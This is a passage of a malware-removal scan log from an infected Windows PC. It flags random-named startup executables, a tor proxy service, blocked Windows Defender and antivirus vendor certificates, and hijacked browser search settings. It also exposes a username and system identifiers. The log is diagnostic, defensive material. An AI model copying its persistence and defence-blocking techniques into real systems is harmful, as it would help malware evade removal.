HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [uTorrent] => "C:\Users\Craciun\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [DAEMON Tools Pro Agent] => C:\Program Files\DAEMON Tools Pro\DTAgent.exe [4807952 2015-02-27] (Disc Soft Ltd)
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [9smAipOnMy.exe] => C:\Program Files\Synaptics\PS1O1Z7IEGLDHYG\9smAipOnMy.exe 
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [7DDHIUFMJV2EL7F] => "C:\Program Files (x86)\ShutdownTime\5FZPC.exe"
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [RestlessDream] => C:\Windows\rss\csrss.exe [3188736 2018-05-24] () <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [6R71.exe] => C:\Users\Craciun\AppData\Local\Temp\CDQUIA1MVU\6R71.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [CloudNet] => C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-10] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [OUXZ.exe] => C:\Users\Craciun\AppData\Local\Temp\TGGSGCKZPL\OUXZ.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [U2DF.exe] => C:\Users\Craciun\AppData\Local\Temp\KE0R86LF9W\U2DF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [YUFW.exe] => C:\Users\Craciun\AppData\Local\Temp\9G237R4OUT\YUFW.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [X7KF.exe] => C:\Users\Craciun\AppData\Local\Temp\Q4WT4U9OKD\X7KF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [J4DW.exe] => C:\Users\Craciun\AppData\Local\Temp\S8U9G5VHAK\J4DW.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QC81.exe] => C:\Users\Craciun\AppData\Local\Temp\WXRTGWWTMA\QC81.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LXYS.exe] => C:\Users\Craciun\AppData\Local\Temp\88RDI2YFE2\LXYS.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [TG0F.exe] => C:\Users\Craciun\AppData\Local\Temp\TG0FRLEG66\TG0F.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [U5Y0.exe] => C:\Users\Craciun\AppData\Local\Temp\U5Y0DOU28Z\U5Y0.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [3BMC.exe] => C:\Users\Craciun\AppData\Local\Temp\SN8NAMCXNP\3BMC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [K5DU.exe] => C:\Users\Craciun\AppData\Local\Temp\VAOXBKCGFX\K5DU.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [FIHG.exe] => C:\Users\Craciun\AppData\Local\Temp\2TA1Y9DOJW\FIHG.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [YOV7.exe] => C:\Users\Craciun\AppData\Local\Temp\LZOS39VX3X\YOV7.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [H6Z0.exe] => C:\Users\Craciun\AppData\Local\Temp\GOU608OGIL\H6Z0.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [CKIC.exe] => C:\Users\Craciun\AppData\Local\Temp\ZVCX6FUVQ7\CKIC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [53NL.exe] => C:\Users\Craciun\AppData\Local\Temp\WF2NKP99YT\53NL.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [KWWC.exe] => C:\Users\Craciun\AppData\Local\Temp\98JOIXN0JH\KWWC.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QVLM.exe] => C:\Users\Craciun\AppData\Local\Temp\D6E7ZCWRA6\QVLM.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [QLWM.exe] => C:\Users\Craciun\AppData\Local\Temp\QLWMUKQ53V\QLWM.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [FCY5.exe] => C:\Users\Craciun\AppData\Local\Temp\FCY5J3YAYR\FCY5.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [8G3O.exe] => C:\Users\Craciun\AppData\Local\Temp\8G3OPERZE7\8G3O.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [MUSU.exe] => C:\Users\Craciun\AppData\Local\Temp\MUSUQ6URHH\MUSU.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LCQF.exe] => C:\Users\Craciun\AppData\Local\Temp\8NK0ND5Z6H\LCQF.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [P5VP.exe] => C:\Users\Craciun\AppData\Local\Temp\P5VP6BI7NG\P5VP.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [V6OZ.exe] => C:\Users\Craciun\AppData\Local\Temp\V6OZMU6NHQ\V6OZ.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JAQ3.exe] => C:\Users\Craciun\AppData\Local\Temp\ZIV2N825LS\JAQ3.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [HMHK.exe] => C:\Users\Craciun\AppData\Local\Temp\HMHKW0J8G1\HMHK.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [Z87K.exe] => C:\Users\Craciun\AppData\Local\Temp\Z87KLFT34W\Z87K.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [042B.exe] => C:\Users\Craciun\AppData\Local\Temp\CQI82VFER8\042B.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JOBY.exe] => C:\Users\Craciun\AppData\Local\Temp\JOBYT3PP9O\JOBY.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [7445.exe] => C:\Users\Craciun\AppData\Local\Temp\EOP5OYG8UR\7445.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [IZU8.exe] => C:\Users\Craciun\AppData\Local\Temp\IZU8IX3CIG\IZU8.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [MaxiBuy] => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [95904 2018-05-02] (Python Software Foundation) <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [K98S.exe] => C:\Users\Craciun\AppData\Local\Temp\K98SCZW5CO\K98S.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [AD0N.exe] => C:\Users\Craciun\AppData\Local\Temp\XOU8ZSM5DL\AD0N.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [R02G.exe] => C:\Users\Craciun\AppData\Local\Temp\R02GTSCW7N\R02G.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [W5PX.exe] => C:\Users\Craciun\AppData\Local\Temp\W5PXPDVPH1\W5PX.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [LF5I.exe] => C:\Users\Craciun\AppData\Local\Temp\JU96A3V4UT\LF5I.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [2BGG.exe] => C:\Users\Craciun\AppData\Local\Temp\V7SUS9JGHN\2BGG.exe  <==== ATTENTION
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\app.ex
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\Run: [UCF4.exe] => C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe [452608 2018-06-11] () <==== ATTENTION
AppInit_DLLs: C:\ProgramData\Subair\Trusttansoft.dll => C:\ProgramData\Subair\Trusttansoft.dll [342528 2018-05-26] ()
AppInit_DLLs-x32: C:\ProgramData\Subair\S--Fix.dll => C:\ProgramData\Subair\S--Fix.dll [460800 2018-05-26] ()
ShellExecuteHooks: No Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] () <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{0b41cb42-7f71-4fe2-a7d7-a86604cbe95a}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{bd1fecd1-e9c9-4f98-a7f1-e2b2d288d553}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoofG1UzdLvJaOTe5RZu6mfibq4HA6E3-LxFj4oSu6ZB6kD9RIOjbV3B7D5mvYBN6KpUo6tpuMSJcs10XaI4YpAln9M9NA,
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {A16A49A0-78F1-4E53-AB5A-E15E791CE3BB} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY1JmNoT6P_LBC58xFfZfVmoWmroNmrmUx8_e4oxvuDKV9xTzbBCRgXd1mMyYXcmAdQQyyvLWU57UoocABathQHtYaRfAjwJpXRqIgaWUaVd1HXtAhJiyaJgHOJ4wq7EDZHG4Pa06A1qF3LSfTcbkeUsTXIcpzbBTXUQzjikUs,&q={searchTerms}
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\ssv.dll [2018-01-30] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\jp2ssv.dll [2018-01-30] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: blqunqo0.default
FF ProfilePath: C:\Users\Craciun\AppData\Roaming\Mozilla\Firefox\Profiles\blqunqo0.default [2018-06-11]
FF Homepage: Mozilla\Firefox\Profiles\blqunqo0.default -> C:\ProgramData\Subairs\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\blqunqo0.default -> C:\ProgramData\Subairs\ff.NT
FF SearchPlugin: C:\Users\Craciun\AppData\Roaming\Mozilla\Firefox\Profiles\blqunqo0.default\searchplugins\findit.xml [2018-05-26]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.161.2 -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\dtplugin\npDeployJava1.dll [2018-01-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.161.2 -> C:\Program Files (x86)\Java\jre1.8.0_161\bin\plugin2\npjp2.dll [2018-01-30] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [No File]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems)
 
Chrome: 
=======
CHR res: Infected resources.pak (Adware script). Reinstall Chrome. <==== ATTENTION
CHR HomePage: Default -> inline.go.mail.ru
CHR StartupUrls: Default -> "hxxps://www.google.ro/?pli=1"
CHR DefaultSearchURL: Default -> hxxps://www.google.ro/search?source=hp&ei=jQQbW7ejGsWiwALNrqHoCw&btnG=C%C4%83uta%C8%9Bi&q={searchTerms}&oq=how+to+get+to+system+settings+when+boot&gs_l=psy-ab.3...7315.57108.0.57433.116.76.0.0.0.0.1430.1430.7-1.1.0....0...1.1.64.psy-ab..115.1.1429.0..0i8i10i30k1.0.PEgGww2OXY8
CHR Profile: C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default [2018-06-11]
CHR Extension: (Slides) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Docs) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Google Drive) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-28]
CHR Extension: (YouTube) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-28]
CHR Extension: (Sheets) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (Google Docs Offline) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-28]
CHR Extension: (AdBlock) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-05-24]
CHR Extension: (Video Adblocker for Youtube™ Extension) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hflefjhkfeiaignkclmphmokmmbhbhik [2018-05-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-04]
CHR Extension: (Gmail) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-28]
CHR Extension: (Chrome Media Router) - C:\Users\Craciun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-05-02]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems, Incorporated)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6541008 2018-05-09] (Malwarebytes)
R2 MicroService; C:\Users\Craciun\AppData\Local\XService\XService.dll [585216 2018-05-24] () [File not signed] <==== ATTENTION
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [201360 2012-09-27] (Realtek Semiconductor)
R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [250136 2017-05-04] (Realtek Semiconductor Corp.)
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop245.exe [517432 2018-05-21] (PandaViewer)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-04-12] (Microsoft Corporation)
S3 ssh-agent; C:\Windows\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [278616 2017-05-05] (Synaptics Incorporated)
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [593920 2018-06-08] (SystemaRev) [File not signed] <==== ATTENTION
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\NisSrv.exe [4632736 2018-04-26] (Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.14.17639.18041-0\MsMpEng.exe [104680 2018-04-26] (Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== ATTENTION
S3 Disc Soft Pro Bus Service; "C:\Program Files\DAEMON Tools Pro\DiscSoftBusService.exe" [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ATTENTION
S2 Subair; C:\ProgramData\\Subair\\Subair.exe shuz -f "C:\ProgramData\\Subair\\Subair.dat" -l -a <==== ATTENTION
R2 TCPSvc; "C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Craciun\AppData\Local\Temp\csrss\proxy\t" <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2016-12-06] (Disc Soft Ltd)
R3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30352 2017-07-06] (Disc Soft Ltd)
R1 gtkrnl; C:\Windows\System32\drivers\gtkrnl.sys [126856 2018-03-28] ()
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-03] (REALiX™)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [984032 2017-07-05] (Realtek )
R3 RtkBtFilter; C:\Windows\system32\DRIVERS\RtkBtfilter.sys [712704 2017-05-10] (Realtek Semiconductor Corporation)
R3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [419296 2017-05-04] (Realsil Semiconductor Corporation)
R3 rtwlane_13; C:\Windows\System32\drivers\rtwlane_13.sys [3717120 2018-04-12] (Realtek Semiconductor Corporation )
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-13] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [51392 2015-10-09] (Synaptics Incorporated)
